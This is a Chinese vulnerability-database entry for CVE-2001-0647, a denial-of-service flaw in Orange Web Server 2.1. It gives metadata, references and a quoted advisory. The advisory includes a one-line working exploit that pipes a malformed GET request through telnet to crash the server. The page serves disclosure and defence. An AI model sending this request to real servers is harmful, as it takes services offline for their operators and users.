Orange Web Server DoS漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106230 漏洞类型 其他
发布时间 2001-02-27 更新时间 2007-01-25
CVE编号 CVE-2001-0647 CNNVD-ID CNNVD-200108-030
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20655
https://www.securityfocus.com/bid/2432
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-030
|漏洞详情
基于GoAhead的OrangeWebServer2.1版本存在漏洞。远程攻击者借助不包含HTTP版本的HTTPGET执行服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/2432/info

A remote user can cause a denial-of-service condition in Orange Software Orange Web Server.

The attacker could submit a specially crafted GET request via a telnet connection to cause the server to crash.

A restart of the server is required to gain normal functionality. 

echo "GET A" | telnet target
|受影响的产品
Orange Software Orange Web Server 2.1 + GoAhead Software GoAhead WebServer 2.1 - Microsoft Windows 2000 Professional -
|参考资料

来源:BID
名称:2432
链接:http://www.securityfocus.com/bid/2432
来源:BUGTRAQ
名称:20010227OrangeWebServerv2.1DoS
链接:http://www.securityfocus.com/archive/1/165658